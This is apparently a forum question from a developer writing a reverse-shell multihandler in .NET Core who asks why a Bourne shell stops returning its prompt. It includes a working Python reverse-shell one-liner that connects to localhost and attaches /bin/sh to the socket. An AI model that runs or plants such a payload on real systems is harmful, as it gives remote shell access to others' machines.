This may end up being a confusing question if you don't understand reverse shells, but the TL;DR is I'm trying to write a shell multihandler in .NET Core.
I have it handling bash, cmd, and PowerShell shells just fine. However, when I try and handle a Bourne shell, it connects just fine, but the shell seems to hang when I send it commands.
I believe the issue is not properly terminating the command with the right hex.
Just for the POC, this code splits out the Bourne shell:
```csharp
if (ShellOsType == OsType.Linux && Prompt.Trim() == "$")
{
    // Bourne shell ("$" prompt): terminate the command with a bare LF
    writer.Write(command + "\n");
}
else
{
    writer.WriteLine(command); //if I use WriteLine for the bourne shell, the shell throws an error : not found
}
```
and the reverse shell is this command:
```bash
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",13443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
When I test this with netcat it works exactly how you'd expect. So the issue must be something to do with my .NET Core app and how it's handling it.
When I send a command
```
whoami\n
```
I'm expecting 2 lines in return
```
myusername
$
```
but I'm only getting one line in response
```
myusername
```
And if I go to where I created my reverse shell and hit CTRL+C it doesn't kill my shell but it does force it to send the second line to my handler.
**What have I tried?**
I've tried opening an ASCII hex table and using everything up to the letters both before and after the `\n` in case I was missing something, and nothing works, but it does make it worse in some cases.
Asked by DotNetRussell
(329 rep)
Jul 14, 2024, 07:18 PM
Last activity: Jul 14, 2024, 07:51 PM